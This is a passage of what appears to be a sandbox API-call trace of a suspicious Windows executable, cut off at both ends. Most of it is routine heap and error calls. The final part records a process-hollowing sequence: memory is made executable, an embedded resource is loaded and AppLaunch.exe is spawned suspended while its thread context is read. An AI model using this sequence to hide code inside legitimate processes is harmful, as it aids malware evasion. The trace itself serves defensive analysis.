(hModule=0x769b0000, lpProcName="GetLocaleInfoEx") returned 0x76a44cf1 [0138.785] GetProcAddress (hModule=0x769b0000, lpProcName="GetTimeFormatEx") returned 0x76a56ba1 [0138.786] GetProcAddress (hModule=0x769b0000, lpProcName="GetUserDefaultLocaleName") returned 0x76a44d61 [0138.786] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidLocaleName") returned 0x76a44d81 [0138.787] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0138.787] GetLastError () returned 0x7e [0138.788] GetProcAddress (hModule=0x769b0000, lpProcName="LCIDToLocaleName") returned 0x769ecec4 [0138.789] GetProcAddress (hModule=0x769b0000, lpProcName="LocaleNameToLCID") returned 0x76a44da1 [0138.789] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x20) returned 0x26a468 [0138.789] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x268140 [0138.789] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268140 | out: hHeap=0x250000) returned 1 [0138.789] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x268140 [0138.839] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x2662a8 [0138.839] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x26bc80 [0138.839] GetLastError () returned 0x7e [0138.839] SetLastError (dwErrCode=0x7e) [0138.911] GetLastError () returned 0x7e [0138.911] SetLastError (dwErrCode=0x7e) [0138.911] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cc50 [0138.911] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26cd10 [0139.223] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd10 | out: hHeap=0x250000) returned 1 [0139.223] GetLastError () returned 0x7e [0139.223] SetLastError (dwErrCode=0x7e) [0139.223] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0139.223] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x26abe8 [0139.223] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4) returned 0x26abf8 [0139.223] GetLastError () returned 0x7e [0139.223] SetLastError (dwErrCode=0x7e) [0139.223] GetLastError () returned 0x7e [0139.223] SetLastError (dwErrCode=0x7e) [0139.223] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cd10 [0139.223] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26cdd0 [0139.224] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdd0 | out: hHeap=0x250000) returned 1 [0139.224] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0139.224] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cc50 | out: hHeap=0x250000) returned 1 [0139.224] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abf8 | out: hHeap=0x250000) returned 1 [0139.224] GetLastError () returned 0x7e [0139.224] SetLastError (dwErrCode=0x7e) [0139.224] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0139.224] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x26abf8 [0139.224] GetLastError () returned 0x7e [0139.224] SetLastError (dwErrCode=0x7e) [0139.224] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x200) returned 0x26cdd0 [0139.224] GetLastError () returned 0x7e [0139.224] SetLastError (dwErrCode=0x7e) [0139.224] GetLastError () returned 0x7e [0139.224] SetLastError (dwErrCode=0x7e) [0139.294] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4) returned 0x26ac08 [0139.294] GetLastError () returned 0x7e [0139.294] SetLastError (dwErrCode=0x7e) [0139.294] GetLastError () returned 0x7e [0139.294] SetLastError (dwErrCode=0x7e) [0139.294] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cc50 [0139.294] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26cfd8 [0139.294] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cfd8 | out: hHeap=0x250000) returned 1 [0139.294] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0139.295] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd10 | out: hHeap=0x250000) returned 1 [0139.295] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac08 | out: hHeap=0x250000) returned 1 [0139.295] GetLastError () returned 0x7e [0139.295] SetLastError (dwErrCode=0x7e) [0139.295] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0139.295] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abf8 | out: hHeap=0x250000) returned 1 [0139.295] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abe8 | out: hHeap=0x250000) returned 1 [0139.295] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x26abe8 [0139.345] GetSystemInfo (in: lpSystemInfo=0x18fe88 | out: lpSystemInfo=0x18fe88*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0139.873] GetLastError () returned 0x57 [0139.873] SetLastError (dwErrCode=0x57) [0139.909] GetLastError () returned 0x57 [0139.909] SetLastError (dwErrCode=0x57) [0139.909] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1000) returned 0x26cfd8 [0139.960] SendMessageCallbackA (hWnd=0x0, Msg=0x4, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.961] GetLastError () returned 0x578 [0139.961] SetLastError (dwErrCode=0x578) [0139.961] SendMessageCallbackA (hWnd=0x0, Msg=0x5, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.961] GetLastError () returned 0x578 [0139.961] SetLastError (dwErrCode=0x578) [0139.961] SendMessageCallbackA (hWnd=0x0, Msg=0x6, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.961] GetLastError () returned 0x578 [0139.961] SetLastError (dwErrCode=0x578) [0139.961] SendMessageCallbackA (hWnd=0x0, Msg=0x7, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.961] GetLastError () returned 0x578 [0139.961] SetLastError (dwErrCode=0x578) [0139.962] SendMessageCallbackA (hWnd=0x0, Msg=0x8, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.962] GetLastError () returned 0x578 [0139.962] SetLastError (dwErrCode=0x578) [0139.962] SendMessageCallbackA (hWnd=0x0, Msg=0x9, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.962] GetLastError () returned 0x578 [0139.962] SetLastError (dwErrCode=0x578) [0139.962] SendMessageCallbackA (hWnd=0x0, Msg=0xa, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.962] GetLastError () returned 0x578 [0139.962] SetLastError (dwErrCode=0x578) [0139.962] SendMessageCallbackA (hWnd=0x0, Msg=0xb, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.962] GetLastError () returned 0x578 [0139.962] SetLastError (dwErrCode=0x578) [0139.962] SendMessageCallbackA (hWnd=0x0, Msg=0xc, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.962] GetLastError () returned 0x578 [0139.962] SetLastError (dwErrCode=0x578) [0139.963] SendMessageCallbackA (hWnd=0x0, Msg=0xd, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.963] GetLastError () returned 0x578 [0139.963] SetLastError (dwErrCode=0x578) [0139.963] SendMessageCallbackA (hWnd=0x0, Msg=0xe, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.963] GetLastError () returned 0x578 [0139.963] SetLastError (dwErrCode=0x578) [0139.963] SendMessageCallbackA (hWnd=0x0, Msg=0xf, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.963] GetLastError () returned 0x578 [0139.963] SetLastError (dwErrCode=0x578) [0139.963] SendMessageCallbackA (hWnd=0x0, Msg=0x10, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.963] GetLastError () returned 0x578 [0139.963] SetLastError (dwErrCode=0x578) [0139.963] SendMessageCallbackA (hWnd=0x0, Msg=0x11, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.963] GetLastError () returned 0x578 [0139.963] SetLastError (dwErrCode=0x578) [0139.963] SendMessageCallbackA (hWnd=0x0, Msg=0x12, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.963] GetLastError () returned 0x578 [0139.964] SetLastError (dwErrCode=0x578) [0139.964] SendMessageCallbackA (hWnd=0x0, Msg=0x13, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.964] GetLastError () returned 0x578 [0139.964] SetLastError (dwErrCode=0x578) [0139.964] SendMessageCallbackA (hWnd=0x0, Msg=0x14, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.964] GetLastError () returned 0x578 [0139.964] SetLastError (dwErrCode=0x578) [0139.964] SendMessageCallbackA (hWnd=0x0, Msg=0x15, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.964] GetLastError () returned 0x578 [0139.964] SetLastError (dwErrCode=0x578) [0139.964] SendMessageCallbackA (hWnd=0x0, Msg=0x16, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.964] GetLastError () returned 0x578 [0139.964] SetLastError (dwErrCode=0x578) [0139.964] SendMessageCallbackA (hWnd=0x0, Msg=0x17, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.964] GetLastError () returned 0x578 [0139.964] SetLastError (dwErrCode=0x578) [0139.965] SendMessageCallbackA (hWnd=0x0, Msg=0x18, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.965] GetLastError () returned 0x578 [0139.965] SetLastError (dwErrCode=0x578) [0139.965] SendMessageCallbackA (hWnd=0x0, Msg=0x19, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.965] GetLastError () returned 0x578 [0139.965] SetLastError (dwErrCode=0x578) [0139.965] SendMessageCallbackA (hWnd=0x0, Msg=0x1a, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.965] GetLastError () returned 0x578 [0139.965] SetLastError (dwErrCode=0x578) [0139.965] SendMessageCallbackA (hWnd=0x0, Msg=0x1b, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.965] GetLastError () returned 0x578 [0139.965] SetLastError (dwErrCode=0x578) [0139.965] SendMessageCallbackA (hWnd=0x0, Msg=0x1c, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.965] GetLastError () returned 0x578 [0139.965] SetLastError (dwErrCode=0x578) [0139.965] SendMessageCallbackA (hWnd=0x0, Msg=0x1d, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.965] GetLastError () returned 0x578 [0139.966] SetLastError (dwErrCode=0x578) [0139.966] SendMessageCallbackA (hWnd=0x0, Msg=0x1e, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.966] GetLastError () returned 0x578 [0139.966] SetLastError (dwErrCode=0x578) [0139.966] SendMessageCallbackA (hWnd=0x0, Msg=0x1f, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.966] GetLastError () returned 0x578 [0139.966] SetLastError (dwErrCode=0x578) [0139.966] SendMessageCallbackA (hWnd=0x0, Msg=0x20, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.966] GetLastError () returned 0x578 [0139.966] SetLastError (dwErrCode=0x578) [0139.966] SendMessageCallbackA (hWnd=0x0, Msg=0x21, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.966] GetLastError () returned 0x578 [0139.966] SetLastError (dwErrCode=0x578) [0139.966] SendMessageCallbackA (hWnd=0x0, Msg=0x22, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.966] GetLastError () returned 0x578 [0139.966] SetLastError (dwErrCode=0x578) [0139.967] SendMessageCallbackA (hWnd=0x0, Msg=0x23, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.967] GetLastError () returned 0x578 [0139.967] SetLastError (dwErrCode=0x578) [0139.967] SendMessageCallbackA (hWnd=0x0, Msg=0x24, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.967] GetLastError () returned 0x578 [0139.967] SetLastError (dwErrCode=0x578) [0139.967] SendMessageCallbackA (hWnd=0x0, Msg=0x25, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.967] GetLastError () returned 0x578 [0139.967] SetLastError (dwErrCode=0x578) [0139.967] SendMessageCallbackA (hWnd=0x0, Msg=0x26, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.967] GetLastError () returned 0x578 [0139.967] SetLastError (dwErrCode=0x578) [0139.967] SendMessageCallbackA (hWnd=0x0, Msg=0x27, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.967] GetLastError () returned 0x578 [0139.967] SetLastError (dwErrCode=0x578) [0139.968] SendMessageCallbackA (hWnd=0x0, Msg=0x28, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.968] GetLastError () returned 0x578 [0139.968] SetLastError (dwErrCode=0x578) [0139.968] SendMessageCallbackA (hWnd=0x0, Msg=0x29, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.968] GetLastError () returned 0x578 [0139.968] SetLastError (dwErrCode=0x578) [0139.968] SendMessageCallbackA (hWnd=0x0, Msg=0x2a, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.968] GetLastError () returned 0x578 [0139.968] SetLastError (dwErrCode=0x578) [0139.968] SendMessageCallbackA (hWnd=0x0, Msg=0x2b, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.968] GetLastError () returned 0x578 [0139.968] SetLastError (dwErrCode=0x578) [0139.968] SendMessageCallbackA (hWnd=0x0, Msg=0x2c, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.968] GetLastError () returned 0x578 [0139.969] SetLastError (dwErrCode=0x578) [0139.969] SendMessageCallbackA (hWnd=0x0, Msg=0x2d, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0139.969] GetLastError () returned 0x578 [0139.969] SetLastError (dwErrCode=0x578) [0139.969] SendMessageCallbackA (hWnd=0x0, Msg=0x2e, wParam=0x0, lParam=0x0, lpResultCallBack=0x0, dwData=0x0) returned 0 [0140.004] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x26abf8 [0140.082] GetLastError () returned 0x578 [0140.082] SetLastError (dwErrCode=0x578) [0140.082] GetLastError () returned 0x578 [0140.082] SetLastError (dwErrCode=0x578) [0140.082] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cd10 [0140.082] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26dfe8 [0140.411] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26dfe8 | out: hHeap=0x250000) returned 1 [0140.411] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0140.411] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cc50 | out: hHeap=0x250000) returned 1 [0140.411] GetLastError () returned 0x578 [0140.411] SetLastError (dwErrCode=0x578) [0140.411] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0140.412] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x26ac08 [0140.412] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4) returned 0x26ac18 [0140.412] GetLastError () returned 0x578 [0140.412] SetLastError (dwErrCode=0x578) [0140.412] GetLastError () returned 0x578 [0140.412] SetLastError (dwErrCode=0x578) [0140.412] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cc50 [0140.412] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26dfe8 [0140.412] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26dfe8 | out: hHeap=0x250000) returned 1 [0140.412] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0140.413] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd10 | out: hHeap=0x250000) returned 1 [0140.413] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac18 | out: hHeap=0x250000) returned 1 [0140.413] GetLastError () returned 0x578 [0140.413] SetLastError (dwErrCode=0x578) [0140.413] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0140.413] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x26ac18 [0140.413] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4) returned 0x26ac28 [0140.413] GetLastError () returned 0x578 [0140.413] SetLastError (dwErrCode=0x578) [0140.413] GetLastError () returned 0x578 [0140.413] SetLastError (dwErrCode=0x578) [0140.413] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cd10 [0140.413] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26dfe8 [0140.413] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26dfe8 | out: hHeap=0x250000) returned 1 [0140.413] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0140.414] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cc50 | out: hHeap=0x250000) returned 1 [0140.414] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac28 | out: hHeap=0x250000) returned 1 [0140.414] GetLastError () returned 0x578 [0140.414] SetLastError (dwErrCode=0x578) [0140.414] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0140.414] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac18 | out: hHeap=0x250000) returned 1 [0140.414] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac08 | out: hHeap=0x250000) returned 1 [0140.414] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x26ac08 [0140.476] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x26bca0 [0140.476] GetLastError () returned 0x578 [0140.476] SetLastError (dwErrCode=0x578) [0140.476] GetLastError () returned 0x578 [0140.476] SetLastError (dwErrCode=0x578) [0140.476] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cc50 [0140.477] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26dfe8 [0140.477] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26dfe8 | out: hHeap=0x250000) returned 1 [0140.477] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0140.477] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd10 | out: hHeap=0x250000) returned 1 [0140.478] GetLastError () returned 0x578 [0140.478] SetLastError (dwErrCode=0x578) [0140.478] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0140.478] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x26ac18 [0140.478] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4) returned 0x26ac28 [0140.478] GetLastError () returned 0x578 [0140.478] SetLastError (dwErrCode=0x578) [0140.478] GetLastError () returned 0x578 [0140.478] SetLastError (dwErrCode=0x578) [0140.478] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26cd10 [0140.478] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26dfe8 [0140.478] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26dfe8 | out: hHeap=0x250000) returned 1 [0140.478] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0140.479] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cc50 | out: hHeap=0x250000) returned 1 [0140.479] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac28 | out: hHeap=0x250000) returned 1 [0140.479] GetLastError () returned 0x578 [0140.479] SetLastError (dwErrCode=0x578) [0140.479] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26abd8 [0140.479] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x26ac28 [0140.479] GetLastError () returned 0x578 [0140.479] SetLastError (dwErrCode=0x578) [0140.479] GetLastError () returned 0x578 [0140.479] SetLastError (dwErrCode=0x578) [0140.479] GetLastError () returned 0x578 [0140.479] SetLastError (dwErrCode=0x578) [0140.479] GetLastError () returned 0x578 [0140.479] SetLastError (dwErrCode=0x578) [0140.479] GetLastError () returned 0x578 [0140.479] SetLastError (dwErrCode=0x578) [0140.479] GetLastError () returned 0x578 [0140.480] SetLastError (dwErrCode=0x578) [0140.480] GetLastError () returned 0x578 [0140.480] SetLastError (dwErrCode=0x578) [0140.480] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1) returned 0x26ac38 [0140.480] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x6) returned 0x26cc50 [0140.480] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5) returned 0x26cc60 [0140.480] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4) returned 0x26e000 [0140.480] GetLastError () returned 0x578 [0140.480] SetLastError (dwErrCode=0x578) [0140.480] GetLastError () returned 0x578 [0140.480] SetLastError (dwErrCode=0x578) [0140.480] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb8) returned 0x26e3e8 [0140.480] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6a6) returned 0x26e4a8 [0140.481] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26e4a8 | out: hHeap=0x250000) returned 1 [0140.481] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abd8 | out: hHeap=0x250000) returned 1 [0140.481] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd10 | out: hHeap=0x250000) returned 1 [0140.481] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26e000 | out: hHeap=0x250000) returned 1 [0140.481] GetLastError () returned 0x578 [0140.481] SetLastError (dwErrCode=0x578) [0140.481] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x26e000 [0140.481] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac28 | out: hHeap=0x250000) returned 1 [0140.481] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac18 | out: hHeap=0x250000) returned 1 [0140.482] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x26e010 [0140.525] GetLastError () returned 0x578 [0140.526] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0140.526] SetLastError (dwErrCode=0x578) [0140.527] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0140.527] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0140.527] VirtualProtect (in: lpAddress=0x18f708, dwSize=0x77e, flNewProtect=0x40, lpflOldProtect=0xb3b28 | out: lpflOldProtect=0xb3b28*=0x4) returned 1 [0140.909] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0140.909] FindResourceW (hModule=0x400000, lpName=0x65, lpType=0xa) returned 0x8f8080 [0140.916] LoadResource (hModule=0x400000, hResInfo=0x8f8080) returned 0x8f80a0 [0140.916] LockResource (hResData=0x8f80a0) returned 0x8f80a0 [0140.916] SizeofResource (hModule=0x400000, hResInfo=0x8f8080) returned 0x1a000 [0140.918] CreateProcessW (in: lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xb39f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xb3b30 | out: lpCommandLine=0x0, lpProcessInformation=0xb3b30*(hProcess=0xac, hThread=0xa8, dwProcessId=0xec4, dwThreadId=0xec8)) returned 1 [0141.077] GetThreadContext (in: hThread=0xa8, lpContext=0xb3728 | out: lpContext=0xb3728*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0xfffde000, Edx=0x0, Ecx=0x0, Eax=0xa6fb00, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x36ffb8, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, 